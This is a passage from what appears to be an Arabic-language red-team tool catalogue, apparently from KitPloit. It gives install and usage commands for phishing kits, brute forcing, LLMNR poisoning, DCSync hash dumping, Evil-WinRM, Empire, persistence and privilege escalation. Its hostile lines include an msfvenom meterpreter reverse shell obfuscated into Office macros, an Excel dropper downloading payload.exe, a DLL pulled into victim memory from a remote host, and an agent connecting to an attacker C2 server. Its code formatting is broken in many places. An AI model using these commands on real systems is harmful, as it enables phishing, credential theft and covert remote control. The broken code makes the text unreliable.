**التثبيت:**```bash
git clone https://github.com/fin3ss3g0d/evilgophish

الاستخدام:``` Usage: ./setup <subdomain(s)>

  • root domain - the root domain to be used for the campaign
  • subdomains - a space separated list of evilginx2 subdomains, can be one if only one
  • root domain bool - true or false to proxy root domain to evilginx2
  • redirect url - URL to redirect unauthorized Apache requests
  • feed bool - true or false if you plan to use the live feed
  • rid replacement - replace the gophish default "rid" in phishing URLs with this value
  • blacklist bool - true or false to use Apache blacklist Example: ./setup.sh example.com "accounts myaccount" false https://redirect.com/ true user_id false
root@kitploit:~
![image](https://assets.kitploit.com/production/public/readmes/147/d21f6533174ab65dbb6ec6fc044fdad87fe0654f01a6be5f17a862588bf9a0ec.png)

### [🔙](#tool-list)[Social Engineer Toolkit (SET)](https://github.com/IO1337/social-engineering-toolkit)

هذا الإطار رائع لإنشاء حملات للوصول الأولي، 'SET لديه عدد من نواقل الهجوم المخصصة التي تسمح لك بصنع هجوم مقنع بسرعة'.

**التثبيت:**```bash
git clone https://github.com/IO1337/social-engineering-toolkit; cd set; python setup.py install

الاستخدام:```bash python3 setoolkit

root@kitploit:~
![image](https://assets.kitploit.com/production/public/readmes/147/962be1664db4237288b6ac2bf77cb98be8c69715d67efdc36178eb16e8178e1c.png)

### [🔙](#tool-list)[Hydra](https://github.com/vanhauser-thc/thc-hydra)

أداة رائعة لهجمات القوة الغاشمة لتسجيل الدخول. يمكنها تنفيذ هجمات القوة الغاشمة على عدد من الخدمات بما في ذلك SSH و FTP و TELNET و HTTP إلخ.

**التثبيت:**```bash
sudo apt install hydra

الاستخدام:```bash hydra -L USER.TXT -P PASS.TXT 1.1.1.1 http-post-form "login.php:username-^USER^&password=^PASS^:Error" hydra -L USER.TXT -P PASS.TXT 1.1.1.1 ssh

root@kitploit:~
![image](https://assets.kitploit.com/production/public/readmes/147/c1f8846e81658f9a3679da0ff42c1efc12d30861a6a706c61449b956e14f8417.png)

### [🔙](#tool-list)[SquarePhish](https://github.com/secureworks/squarephish)

SquarePhish هي أداة تصيد متقدمة تستخدم تقنية تجمع بين  تدفق مصادقة رمز جهاز OAuth ورموز QR (انظر [PhishInSuits](https://github.com/secureworks/PhishInSuits) لمزيد من المعلومات حول تدفق رمز جهاز OAuth لهجمات التصيد).

خطوات الهجوم:

- إرسال رمز QR ضار إلى الضحية
- يمسح الضحية رمز QR بجهاز محمول
- يتم توجيه الضحية إلى خادم يتحكم فيه المهاجم (تشغيل عملية تدفق مصادقة رمز جهاز OAuth)
- يتم إرسال رمز MFA بالبريد الإلكتروني للضحية (تشغيل مؤقت 15 دقيقة لتدفق رمز جهاز OAuth)
- يقوم المهاجم بالاستعلام عن المصادقة
- يدخل الضحية الرمز في موقع Microsoft الشرعي
- يحفظ المهاجم رمز المصادقة

**التثبيت:**```bash
git clone https://github.com/secureworks/squarephish; cd squarephish; pip install -r requirements.txt

ملاحظة: قبل استخدام أي من الوحدتين، قم بتحديث المعلومات المطلوبة في ملف settings.config المُشار إليها بـ Required.

الاستخدام (وحدة البريد الإلكتروني):``` usage: squish.py email [-h] [-c CONFIG] [--debug] [-e EMAIL]

optional arguments: -h, --help show this help message and exit

-c CONFIG, --config CONFIG squarephish config file [Default: settings.config]

--debug enable server debugging

-e EMAIL, --email EMAIL victim email address to send initial QR code email to

root@kitploit:~
**الاستخدام (وحدة الخادم):**```
usage: squish.py server [-h] [-c CONFIG] [--debug]

optional arguments:
  -h, --help            show this help message and exit

  -c CONFIG, --config CONFIG
                        squarephish config file [Default: settings.config]

  --debug               enable server debugging

image

🔙King Phisher

King Phisher هي أداة تسمح للمهاجمين بإنشاء وإرسال رسائل تصيد إلكتروني إلى الضحايا للحصول على معلومات حساسة.

تتضمن ميزات مثل قوالب قابلة للتخصيص، وإدارة الحملات، وقدرات إرسال البريد الإلكتروني، مما يجعلها أداة قوية وسهلة الاستخدام لتنفيذ هجمات التصيد. باستخدام King Phisher، يمكن للمهاجمين استهداف الأفراد أو المؤسسات برسائل تصيد مستهدفة ومقنعة، مما يزيد من فرص نجاح هجماتهم.

تثبيت (لينكس - العميل والخادم):```bash wget -q https://github.com/securestate/king-phisher/raw/master/tools/install.sh &&
sudo bash ./install.sh

root@kitploit:~
**الاستخدام:**

بمجرد تثبيت King Phisher، يرجى اتباع [صفحة الويكي](https://github.com/rsmusllp/king-phisher/wiki/Getting-Started) لإعداد SSH، وتكوين قاعدة البيانات، وخادم SMTP، إلخ.

![image](https://assets.kitploit.com/production/public/readmes/147/ab8900f24709e60727b9ae8d91dc00da72eb17a099da35552cfd09ad542e20b5.png)

التنفيذ
====================

### [🔙](#tool-list)[Responder](https://github.com/SpiderLabs/Responder)

Responder هي أداة لتسميم بروتوكولات LLMNR و NBT-NS على الشبكة، للسماح بالتقاط بيانات الاعتماد وتنفيذ الأكواد التعسفية.

تُستخدم بروتوكولات LLMNR (تحليل اسم الإرسال المتعدد المحلي) و NBT-NS (خدمة أسماء NetBIOS) بواسطة أنظمة Windows لحل أسماء المضيفين إلى عناوين IP على شبكة محلية. إذا تعذر حل اسم مضيف باستخدام هذه البروتوكولات، فسيقوم النظام ببث طلب لاسم المضيف إلى الشبكة المحلية.

يستمع Responder إلى هذه البثوث ويستجيب بعنوان IP مزيف، مخادعاً النظام الطالب لإرسال بيانات اعتماده إلى المهاجم.

**التثبيت:**```bash
git clone https://github.com/SpiderLabs/Responder#usage
cd Responder

الاستخدام:```bash

Running the tool

./Responder.py [options]

Typical usage

./Responder.py -I eth0 -wrf

root@kitploit:~
يمكن العثور على معلومات الاستخدام الكاملة [هنا](https://github.com/SpiderLabs/Responder#usage).

![صورة](https://assets.kitploit.com/production/public/readmes/147/1557d2d9375fcf140ae01d21311d11ce93eabb676e40f6eb39ec25e0f4959c12.png)

*الصورة مستخدمة من https://www.4armed.com/blog/llmnr-nbtns-poisoning-using-responder/*

### [🔙](#tool-list)[secretsdump](https://github.com/fortra/impacket/blob/master/examples/secretsdump.py)

أداة هي جزء من مكتبة Impacket يمكن استخدامها لاستخراج تجزئات كلمات المرور والأسرار الأخرى من نظام ويندوز.

يقوم بذلك عن طريق التفاعل مع قاعدة بيانات مدير حسابات الأمان (SAM) على النظام واستخراج تجزئات كلمات المرور والمعلومات الأخرى، مثل:

- تجزئات كلمات المرور للحسابات المحلية
- تذاكر ومفاتيح Kerberos
- أسرار LSA

**التثبيت:**```bash
python3 -m pip install impacket

الاستخدام:```bash

Extract NTLM hashes with local files

secretsdump.py -ntds /root/ntds_cracking/ntds.dit -system /root/ntds_cracking/systemhive LOCAL

DCSync attack and dump the NTLM hashes of all domain users.

secretsdump.py -dc-ip 10.10.10.30 MEGACORP.LOCAL/svc_bes:[email protected]

root@kitploit:~
![image](https://assets.kitploit.com/production/public/readmes/147/e9e242c346297388c540da63c467f568ea0b33980e52d48bd8154d745147f192.png)

*الصورة مستخدمة من https://riccardoancarani.github.io/2020-05-10-hunting-for-impacket/#secretsdumppy*

### [🔙](#tool-list)[evil-winrm](https://github.com/Hackplayers/evil-winrm)

Evil-WinRM هي أداة توفر واجهة سطر أوامر لإدارة ويندوز عن بعد (WinRM: *خدمة تسمح للمسؤولين بتنفيذ الأوامر عن بعد على جهاز ويندوز*).

تسمح Evil-WinRM للمهاجم بالاتصال عن بعد بجهاز ويندوز باستخدام WinRM وتنفيذ أوامر عشوائية.

بعض الميزات تشمل:

- تحميل سكريبتات Powershell في الذاكرة
- تحميل ملفات dll في الذاكرة متجاوزاً بعض برامج مكافحة الفيروسات
- تحميل حمولات x64
- دعم Pass-the-hash
- رفع وتنزيل الملفات المحلية والبعيدة

**التثبيت: (Git)**```bash
sudo gem install winrm winrm-fs stringio logger fileutils
git clone https://github.com/Hackplayers/evil-winrm.git
cd evil-winrm

تثبيت: (Ruby gem)```bash gem install evil-winrm

root@kitploit:~
يمكن العثور على تعليمات التثبيت البديلة [هنا](https://github.com/Hackplayers/evil-winrm#installation--quick-start-4-methods).

**الاستخدام:**```bash
# Connect to 192.168.1.100 as Administrator with custom exe/ps1 download folder locations
evil-winrm  -i 192.168.1.100 -u Administrator -p 'MySuperSecr3tPass123!' -s '/home/foo/ps1_scripts/' -e '/home/foo/exe_files/'

# Upload local files to victim
upload local_filename
upload local_filename destination_filename

# Download remote files to local machine
download remote_filename
download remote_filename destination_filename

# Execute .Net assembly into victim memory
Invoke-Binary /opt/csharp/Rubeus.exe

# Load DLL library into victim memory
Dll-Loader -http http://10.10.10.10/SharpSploit.dll

يمكن العثور على وثائق الاستخدام الكاملة هنا.

صورة

الصورة المستخدمة من https://korbinian-spielvogel.de/posts/heist-writeup/

🔙Donut

أداة للتنفيذ داخل الذاكرة لملفات VBScript وJScript وEXE وDLL وتجميعات dotNET. يمكن استخدامها لتحميل وتشغيل الحمولات المخصصة على الأنظمة المستهدفة دون الحاجة إلى إسقاط الملفات على القرص.

التثبيت: (Windows)```bash git clone http://github.com/thewover/donut.git

root@kitploit:~
لإنشاء قالب المحمل، والمكتبة الديناميكية donut.dll، والمكتبة الثابتة donut.lib، والمولد donut.exe. ابدأ تشغيل موجه أوامر المطور لـ Microsoft Visual Studio x64، وانتقل إلى الدليل الذي استنسخت فيه مستودع Donut، ثم أدخل ما يلي:```bash
nmake -f Makefile.msvc

لفعل الشيء نفسه، باستثناء استخدام MinGW-64 على Windows أو Linux، انتقل إلى الدليل الذي استنسخت فيه مستودع Donut وأدخل ما يلي:```bash make -f Makefile.mingw

root@kitploit:~
**تثبيت: (Linux)**```bash
pip3 install donut-shellcode

استخدام:```bash

Creating shellcode from an XSL file that pops up a calculator.

shellcode = donut.create(file=r"C:\Tools\Source\Repos\donut\calc.xsl")

Creating shellcode from an unmanaged DLL. Invokes DLLMain.

shellcode = donut.create(file=r"C:\Tools\Source\Repos\donut\payload\test\hello.dll")

root@kitploit:~
للحصول على معلومات الاستخدام الكاملة، راجع صفحة دونات على [GitHub Page](https://github.com/TheWover/donut/#4-usage).

اطلع على [منشور مدونة حديث](https://thewover.github.io/Bear-Claw/) من The Wover لمزيد من المعلومات.

![image](https://assets.kitploit.com/production/public/readmes/147/f1dba24c73e1bc864c83173904c6592faee2f8aa854da293767b90d69449d5c4.png)

### [🔙](#tool-list)[Macro_pack](https://github.com/sevagas/macro_pack)

أداة تُستخدم لأتمتة إخفاء وإنشاء مستندات Office، ونصوص VB، والاختصارات، وتنسيقات أخرى لفرق الاختراق (red teaming).

**التثبيت: (ثنائي)** 

1. احصل على أحدث إصدار ثنائي من [https://github.com/sevagas/macro_pack/releases/](https://github.com/sevagas/macro_pack/releases/)
2. قم بتنزيل الإصدار الثنائي على جهاز كمبيوتر مثبت عليه Microsoft Office أصلي.
3. افتح وحدة التحكم، واستخدم CD للانتقال إلى دليل الإصدار الثنائي ثم قم بتشغيله.

**التثبيت: (Git)**```bash
git clone https://github.com/sevagas/macro_pack.git
cd macro_pack
pip3 install -r requirements.txt

الاستخدام:```bash

Help Page

python3 macro_pack.py --help

List all supported file formats

macro_pack.exe --listformats

Obfuscate the vba file generated by msfvenom and puts result in a new VBA file.

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.5 -f vba | macro_pack.exe -o -G meterobf.vba

Obfuscate Empire stager VBA file and generate a MS Word document:

macro_pack.exe -f empire.vba -o -G myDoc.docm

Generate an MS Excel file containing an obfuscated dropper (download payload.exe and store as dropped.exe)

echo "https://myurl.url/payload.exe" "dropped.exe" | macro_pack.exe -o -t DROPPER -G "drop.xlsm"

Execute calc.exe via Dynamic Data Exchange (DDE) attack

echo calc.exe | macro_pack.exe --dde -G calc.xslx

root@kitploit:~
![image](https://assets.kitploit.com/production/public/readmes/147/05a46a14fba117c71b6b79cec0cccbc403531a302add46b9e55035e7d9d634ef.png)

### [🔙](#tool-list)[PowerSploit](https://github.com/PowerShellMafia/PowerSploit)

مجموعة من نصوص ووحدات PowerShell النصية التي يمكن استخدامها لتحقيق أهداف متنوعة للفريق الأحمر.

بعض ميزات PowerSploit:

- تفريغ هاشات كلمات المرور واستخراج كلمات المرور النصية الواضحة من الذاكرة
- رفع الصلاحيات وتجاوز ضوابط الأمان
- تنفيذ كود PowerShell عشوائي وتجاوز قيود التنفيذ
- إجراء استطلاع واكتشاف للشبكة
- توليد حمولات وتنفيذ استغلالات

**التثبيت:** *1. احفظ في مجلد وحدات PowerShell*

أولاً، ستحتاج إلى تنزيل [مجلد PowerSploit](https://github.com/PowerShellMafia/PowerSploit) وحفظه في مجلد وحدات PowerShell الخاص بك.

يمكن العثور على مسار مجلد وحدات PowerShell الخاص بك باستخدام الأمر التالي:```
$Env:PSModulePath

التثبيت: 2. تثبيت PowerSploit كوحدة نمطية لـ PowerShell

ستحتاج بعد ذلك إلى تثبيت وحدة PowerSploit (استخدم اسم المجلد الذي تم تنزيله).

ملاحظة: قد تمنعك سياسة تنفيذ PowerShell من ذلك، لإصلاح هذه المشكلة قم بتشغيل الأمر التالي.``` powershell.exe -ep bypass

root@kitploit:~
يمكنك الآن تثبيت وحدة PowerSploit.```
Import-Module PowerSploit

الاستخدام:``` Get-Command -Module PowerSploit

root@kitploit:~
![image](https://assets.kitploit.com/production/public/readmes/147/be1d37fac661a710be1a2268f5f0090e13b496c05f8d22b56d47e166072e5fff.png)

### [🔙](#tool-list)[Rubeus](https://github.com/GhostPack/Rubeus)

أداة يمكن استخدامها لتنفيذ إجراءات متنوعة متعلقة ببيئات Microsoft Active Directory (AD)، مثل تفريغ تجزئات كلمات المرور، إنشاء/حذف المستخدمين، وتعديل خصائص المستخدمين.

بعض ميزات Rubeus:

- Kerberoasting
- هجمات التذكرة الذهبية (Golden ticket)
- هجمات التذكرة الفضية (Silver ticket)

**التثبيت: (تنزيل)**

يمكنك تثبيت الثنائي Rubeus غير الرسمي المُجمّع مسبقًا [هنا](https://github.com/r3motecontrol/Ghostpack-CompiledBinaries/blob/master/Rubeus.exe).

**التثبيت: (ترجمة)**

Rubeus متوافق مع [Visual Studio 2019 Community Edition](https://visualstudio.microsoft.com/vs/community/). افتح ملف [project .sln](https://github.com/GhostPack/Rubeus) لمشروع Rubeus، اختر "Release"، ثم قم بالبناء.

**الاستخدام:**```
Rubeus.exe -h

image

🔙SharpUp

أداة مفيدة لفحص نقطة نهاية الضحية بحثًا عن الثغرات المتعلقة بالعمليات ذات السلامة العالية، والمجموعات، والمسارات القابلة للاختطاف، وما إلى ذلك.

التثبيت: (تنزيل)

يمكنك تثبيت الثنائي SharpUp غير الرسمي والمُجمّع مسبقًا هنا.

التثبيت: (تجميع)

SharpUp متوافق مع Visual Studio 2015 Community Edition. افتح ملف المشروع .sln الخاص بـ SharpUp، واختر "Release"، ثم قم بالبناء.

الاستخدام:```bash SharpUp.exe audit #-> Runs all vulnerability checks regardless of integrity level or group membership.

SharpUp.exe HijackablePaths #-> Check only if there are modifiable paths in the user's %PATH% variable.

SharpUp.exe audit HijackablePaths #-> Check only for modifiable paths in the user's %PATH% regardless of integrity level or group membership.

root@kitploit:~
![image](https://assets.kitploit.com/production/public/readmes/147/881494f39c898e7951e05d177aeaef111636ae85c7a4c9a607f337e3318f7d77.png)

### [🔙](#tool-list)[SQLRecon](https://github.com/skahwah/SQLRecon)

MS-SQL (Microsoft SQL Server) هو نظام إدارة قواعد بيانات علائقية تم تطويره وتسويقه بواسطة Microsoft.

تم تصميم هذه الأداة (C# MS-SQL) للاستطلاع الهجومي وما بعد الاستغلال. للحصول على معلومات مفصلة حول استخدام كل تقنية، راجع [wiki](https://github.com/skahwah/SQLRecon/wiki).

**التثبيت: (ثنائي)**

يمكنك تنزيل أحدث إصدار ثنائي من [هنا](https://github.com/skahwah/SQLRecon/releases).

**الاستخدام:**```bash
# Authenticating using Windows credentials
SQLRecon.exe -a Windows -s SQL01 -d master -m whoami

# Authenticating using Local credentials
SQLRecon.exe -a Local -s SQL02 -d master -u sa -p Password123 -m whoami

# Authenticating using Azure AD credentials
SQLRecon.exe -a azure -s azure.domain.com -d master -r domain.com -u skawa -p Password123 -m whoami

# Run whoami
SQLRecon.exe -a Windows -s SQL01 -d master -m whoami

# View databases
SQLRecon.exe -a Windows -s SQL01 -d master -m databases

# View tables
SQLRecon.exe -a Windows -s SQL01 -d master -m tables -o AdventureWorksLT2019

يمكن العثور على معلومات الاستخدام الكاملة في الويكي.

يمكن العثور على معلومات استخدام وحدة الأداة هنا.

image

الصورة مأخوذة من صفحة تعليمات SQLRecon

🔙UltimateAppLockerByPassList

هذا المورد عبارة عن مجموعة من أشهر التقنيات المعروفة لتجاوز AppLocker.

نظرًا لأنه يمكن تكوين AppLocker بطرق مختلفة، يحتفظ @api0cradle بقائمة موثقة من عمليات التجاوز (التي تعمل مقابل القواعد الافتراضية لـ AppLocker) وقائمة بتقنيات التجاوز المحتملة (حسب التكوين) أو التي يُزعم أنها تجاوز من قبل شخص ما.

لديهم أيضًا قائمة بتقنيات التجاوز العامة بالإضافة إلى قائمة قديمة بالطرق للتنفيذ عبر ملفات DLL.

قوائم مفهرسة

  • Generic-AppLockerbypasses.md
  • VerifiedAppLockerBypasses.md
  • UnverifiedAppLockerBypasses.md
  • DLL-Execution.md

image

الصورة مأخوذة من https://github.com/api0cradle/UltimateAppLockerByPassList

🔙StarFighters

مُطلق إمبراطورية (Empire) يعتمد على JavaScript وVBScript، ويعمل ضمن مضيف PowerShell المضمن الخاص به.

يعمل كلا المُطلِقين ضمن مضيف PowerShell المضمن الخاص بهذا، لذلك لا نحتاج إلى PowerShell.exe.

قد يكون هذا مفيدًا عندما تمنع الشركة استخدام PowerShell.exe و/أو تستخدم حل قائمة بيضاء للتطبيقات، ولكنها لا تمنع تشغيل ملفات JS/VBS.

الاستخدام:

  • قم بإعداد مستمع جديد داخل PowerShell Empire
  • استخدم أمر المُطلِق (Launcher) لإنشاء مُطلِق PowerShell لهذا المستمع
  • انسخ واستبدل حمولة المُطلِق المشفرة بـ Base64 داخل ملف StarFighter JavaScript أو VBScript

للإصدار المعتمد على JavaScript، استخدم المتغير التالي:```javascript var EncodedPayload = ""

root@kitploit:~
بالنسبة لإصدار VBScript، استخدم المتغير التالي:```vbscript
  Dim EncodedPayload: EncodedPayload = "<Paste Encoded Launcher Payload Here>"
  • ثم قم بتشغيل: wscript.exe StarFighter.js أو StarFighter.vbs على الهدف، أو انقر نقرًا مزدوجًا على المشغلات داخل Explorer.

image

صورة مستخدمة من https://www.hackplayers.com/2017/06/startfighters-un-launcher-de-empire-en-js-vbs.html

🔙demiguise

الهدف من هذا المشروع هو إنشاء ملفات .html تحتوي على ملف HTA مشفر.

الفكرة هي أنه عندما يزور هدفك الصفحة، يتم جلب المفتاح وفك تشفير ملف HTA ديناميكيًا داخل المتصفح ودفعه مباشرة إلى المستخدم.

هذه تقنية مراوغة للالتفاف حول فحص المحتوى / نوع الملف الذي تنفذه بعض الأجهزة الأمنية.

مزيد من المعلومات التقنية هنا.

التثبيت:``` git clone https://github.com/nccgroup/demiguise cd demiguise

root@kitploit:~
**الاستخدام:**```bash
# Generate an encrypted .hta file that executes notepad.exe
python demiguise.py -k hello -c "notepad.exe" -p Outlook.Application -o test.hta

image

الصورة مستخدمة من https://github.com/nccgroup/demiguise

🔙PowerZure

PowerZure هو مشروع PowerShell تم إنشاؤه لتقييم واستغلال الموارد داخل منصة السحابة مايكروسوفت، Azure. تم إنشاء PowerZure نتيجة للحاجة إلى إطار عمل يمكنه تنفيذ كل من الاستطلاع واستغلال Azure وAzureAD والموارد المرتبطة بهما.

لا يوجد أي سبب لتشغيل PowerZure على جهاز الضحية. يتم المصادقة باستخدام ملف accesstoken.json موجود مسبقًا أو عن طريق تسجيل الدخول عبر موجه عند تسجيل الدخول إلى Azure، مما يعني أنه يمكنك استخدام PowerZure بأمان للتفاعل مع مثيل سحابي للضحية من جهاز التشغيل الخاص بك.

التثبيت:```bash Install-Module -Name Az git clone https://github.com/hausec/PowerZure cd PowerZure ipmo C:\path\to\PowerZure.psd1

root@kitploit:~
**الاستخدام:**```bash
# Get a list of AzureAD and Azure objects you have access to
Get-AzureTarget

Blog - Attacking Azure, Azure AD, and Introducing PowerZure

image

صورة مستخدمة من https://hakin9.org

الثبات

🔙Impacket

توفر Impacket مجموعة من الروابط Python منخفضة المستوى لمختلف بروتوكولات الشبكة، بما في ذلك SMB وKerberos وLDAP، بالإضافة إلى مكتبات عالية المستوى للتفاعل مع خدمات الشبكة وأداء مهام محددة مثل تفريغ تجزئات كلمات المرور وإنشاء مشاركات الشبكة.

كما تتضمن عددًا من أدوات سطر الأوامر التي يمكن استخدامها لأداء مهام متنوعة مثل تفريغ قواعد بيانات SAM، وتعداد الثقة في المجال، وكسر كلمات مرور Windows.

التثبيت:```bash python3 -m pip install impacket

root@kitploit:~
**التثبيت: (مع نصوص أمثلة)**

قم بتنزيل واستخراج [الحزمة](https://github.com/fortra/impacket)، ثم انتقل إلى مجلد التثبيت وشغّل...```bash
python3 -m pip install .

الاستخدام:```bash

Extract NTLM hashes with local files

secretsdump.py -ntds /root/ntds_cracking/ntds.dit -system /root/ntds_cracking/systemhive LOCAL

Gets a list of the sessions opened at the remote hosts

netview.py domain/user:password -target 192.168.10.2

Retrieves the MSSQL instances names from the target host.

mssqlinstance.py 192.168.1.2

This script will gather data about the domain's users and their corresponding email addresses.

GetADUsers.py domain/user:password@IP

root@kitploit:~
Great [cheat sheet](https://cheatsheet.haax.fr/windows-systems/exploitation/impacket/) لاستخدام Impacket.

![image](https://assets.kitploit.com/production/public/readmes/147/2be6291c92daeeea07d0afe27bcf2ecde2bd9676d07e84e8b7c6ee823887e902.png)

### [🔙](#tool-list)[Empire](https://github.com/EmpireProject/Empire)

Empire هو إطار عمل للاستغلال بعد الاختراق يسمح لك بتوليد حمولات لإنشاء اتصالات عن بُعد مع أنظمة الضحايا.

بمجرد تنفيذ حمولة على نظام الضحية، فإنها تنشئ اتصالاً يعود إلى خادم Empire، والذي يمكن استخدامه بعد ذلك لإصدار أوامر والتحكم في النظام المستهدف.

يتضمن Empire أيضًا عددًا من الوحدات والبرامج النصية المضمنة التي يمكن استخدامها لأداء مهام محددة، مثل تفريغ تجزئات كلمات المرور، والوصول إلى سجل Windows، وتسريب البيانات.

**تثبيت:**```bash
git clone https://github.com/EmpireProject/Empire
cd Empire
sudo ./setup/install.sh

الاستخدام:```bash

Start Empire

./empire

List live agents

list agents

List live listeners

list listeners

root@kitploit:~
ورقة غش لطيفة للاستخدام [cheat sheet](https://github.com/HarmJ0y/CheatSheets/blob/master/Empire.pdf) من [HarmJoy](https://github.com/HarmJ0y).

![image](https://assets.kitploit.com/production/public/readmes/147/3dec2ca6692f2b6431159a32830e854fa994824b8bcf12c797c0bda8a186519d.png)

### [🔙](#tool-list)[SharPersist](https://github.com/mandiant/SharPersist)

مجموعة أدوات استمرار على Windows مكتوبة بلغة C#.

المشروع يحتوي على [wiki](https://github.com/mandiant/SharPersist/wiki).

**التثبيت: (ثنائي)** 

يمكنك العثور على أحدث إصدار [هنا](https://github.com/mandiant/SharPersist/releases).

**التثبيت: (تجميع)** 

- قم بتنزيل ملفات المشروع من [مستودع GitHub](https://github.com/mandiant/SharPersist).
- قم بتحميل مشروع Visual Studio واذهب إلى "Tools" --> "NuGet Package Manager" --> "Package Manager Settings"
- اذهب إلى "NuGet Package Manager" --> "Package Sources"
- أضف مصدر حزمة باستخدام الرابط "https://api.nuget.org/v3/index.json"
- قم بتثبيت حزمة NuGet الخاصة بـ Costura.Fody. الإصدار الأقدم من Costura.Fody (3.3.3) مطلوب، حتى لا تحتاج إلى Visual Studio 2019.
	- `Install-Package Costura.Fody -Version 3.3.3`
- قم بتثبيت حزمة TaskScheduler
	- `Install-Package TaskScheduler -Version 2.8.11`
- يمكنك الآن بناء المشروع بنفسك!

**الاستخدام:**

يمكن العثور على قائمة كاملة من أمثلة الاستخدام [هنا](https://github.com/mandiant/SharPersist#adding-persistence-triggers-add).```
#KeePass
SharPersist -t keepass -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -f "C:\Users\username\AppData\Roaming\KeePass\KeePass.config.xml" -m add 

#Registry
SharPersist -t reg -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -k "hkcurun" -v "Test Stuff" -m add

#Scheduled Task Backdoor
SharPersist -t schtaskbackdoor -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Something Cool" -m add

#Startup Folder
SharPersist -t startupfolder -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -f "Some File" -m add

image

🔙ligolo-ng

Ligolo-ng هي أداة بسيطة وخفيفة وسريعة تسمح لمختبري الاختراق بإنشاء أنفاق من اتصال TCP/TLS عكسي باستخدام واجهة tun (بدون الحاجة إلى SOCKS).

بدلاً من استخدام وكيل SOCKS أو موجهات TCP/UDP، تقوم Ligolo-ng بإنشاء مكدس شبكة في وضع المستخدم باستخدام Gvisor.

عند تشغيل خادم المرحل/الوكيل، يتم استخدام واجهة tun، ويتم ترجمة الحزم المرسلة إلى هذه الواجهة، ثم نقلها إلى شبكة العامل البعيدة.

التثبيت: (تنزيل)

الملفات الثنائية المجمعة مسبقًا (Windows/Linux/macOS) متاحة على صفحة الإصدارات.

التثبيت: (بناء)

بناء ligolo-ng (يتطلب Go >= 1.17):```bash go build -o agent cmd/agent/main.go go build -o proxy cmd/proxy/main.go

Build for Windows

GOOS=windows go build -o agent.exe cmd/agent/main.go GOOS=windows go build -o proxy.exe cmd/proxy/main.go

root@kitploit:~
**الإعداد: (Linux)**```bash
sudo ip tuntap add user [your_username] mode tun ligolo
sudo ip link set ligolo up

الإعداد: (ويندوز)

تحتاج إلى تنزيل برنامج تشغيل Wintun (المستخدم من قبل WireGuard) ووضع ملف wintun.dll في نفس المجلد الذي يحتوي على Ligolo (تأكد من استخدام البنية الصحيحة).

الإعداد: (خادم الوكيل)```bash ./proxy -h # Help options ./proxy -autocert # Automatically request LetsEncrypt certificates

root@kitploit:~
**الاستخدام:**

*قم بتشغيل الوكيل على جهاز الكمبيوتر المستهدف (الضحية) (لا يلزم وجود صلاحيات!):*```bash
./agent -connect attacker_c2_server.com:11601

يجب أن تظهر جلسة على proxy server.``` INFO[0102] Agent joined. name=nchatelain@nworkstation remote="XX.XX.XX.XX:38000"

root@kitploit:~
استخدم الأمر session لتحديد الوكيل.```
ligolo-ng » session 
? Specify a session : 1 - nchatelain@nworkstation - XX.XX.XX.XX:38000

يمكن العثور على معلومات الاستخدام الكاملة هنا.

image

الصورة مستخدمة من https://github.com/nicocha30/ligolo-ng#demo

تصعيد الامتيازات

🔙Crassus

"أنشأت Accenture أداة تسمى Spartacus، والتي تكتشف فرص اختطاف DLL على Windows. باستخدام Spartacus كنقطة انطلاق، أنشأنا Crassus لتوسيع قدرات اكتشاف تصعيد الامتيازات في Windows إلى ما هو أبعد من مجرد البحث عن الملفات المفقودة. يمكن أن تجد قوائم التحكم في الوصول (ACLs) المستخدمة من قبل ملفات وأدلة العمليات ذات الامتيازات أكثر من مجرد البحث عن الملفات المفقودة لتحقيق الهدف." - الرابط

التثبيت: (بناء)

تم تطوير Crassus كمشروع Visual Studio 2019. لبناء Crassus.exe:

  1. افتح Crassus.sln
  2. اضغط على Ctrl+Shift+B على لوحة المفاتيح

التثبيت: (مجمّع مسبقاً)

إذا كنت تثق في تشغيل كود الآخرين دون معرفة ما يفعله، فإن Crassus.exe متوفر في هذا المستودع.

الاستخدام:

  1. في Process Monitor، اختر خيار Enable Boot Logging.
  2. أعد التشغيل.
  3. بمجرد تسجيل الدخول واستقرار Windows، يمكنك أيضًا تشغيل المهام المجدولة التي قد تكون مهيأة للتشغيل بامتيازات اختياريًا.
  4. قم بتشغيل Process Monitor مرة أخرى.
  5. عند الطلب، احفظ سجل التمهيد.
  6. أعد تعيين مرشح Process Monitor الافتراضي باستخدام Ctrl-R.
  7. احفظ ملف السجل هذا، على سبيل المثال، إلى boot.PML. سبب إعادة حفظ ملف السجل هو أمران:
    1. الإصدارات الأقدم من Process Monitor لا تحفظ سجلات التمهيد كملف واحد.
    2. سجلات التمهيد بشكل افتراضي ستكون غير مفلترة، مما قد يحتوي على ضوضاء إضافية، مثل اختطاف DLL من مستخدم محلي عند تشغيل Process Monitor نفسه.

Crassus

الصورة مستخدمة من https://github.com/vu-ls/Crassus?tab=readme-ov-file#screenshots

🔙LinPEAS

LinPEAS هي أداة تصعيد امتيازات مفصلة جيدة للعثور على مسارات تصعيد الامتيازات المحلية على نقاط النهاية لينكس.

التثبيت + الاستخدام:```bash curl -L "https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh" | sh

root@kitploit:~
![image](https://assets.kitploit.com/production/public/readmes/147/75977a81eeb607a2ef06b8524e1792579aa3dc5b245596ee7eeed5938d75f279.png)

### [🔙](#tool-list)[WinPEAS](https://github.com/carlospolop/PEASS-ng/tree/master/winPEAS)

WinPEAS هي أداة تصعيد امتيازات مفصلة جيدة لإيجاد مسارات تصعيد الامتيازات المحلية على نقاط النهاية في Windows.

**التثبيت + الاستخدام:**```bash
$wp=[System.Reflection.Assembly]::Load([byte[]](Invoke-WebRequest "https://github.com/carlospolop/PEASS-ng/releases/latest/download/winPEASany_ofs.exe" -UseBasicParsing | Select-Object -ExpandProperty Content)); [winPEAS.Program]::Main("")

image

🔙linux-smart-enumeration

Linux smart enumeration هي أداة أخرى جيدة وأقل إسهابًا لرفع الامتيازات على لينكس.

التثبيت والاستخدام:```bash curl "https://github.com/diego-treitos/linux-smart-enumeration/releases/latest/download/lse.sh" -Lo lse.sh;chmod 700 lse.sh

root@kitploit:~
![صورة](https://assets.kitploit.com/production/public/readmes/147/0d46a6a3c94f9ce73617ebb098962e9d6d630489e557e57adba93bd24d562808.png)

### [🔙](#tool-list)[Certify](https://github.com/GhostPack/Certify)

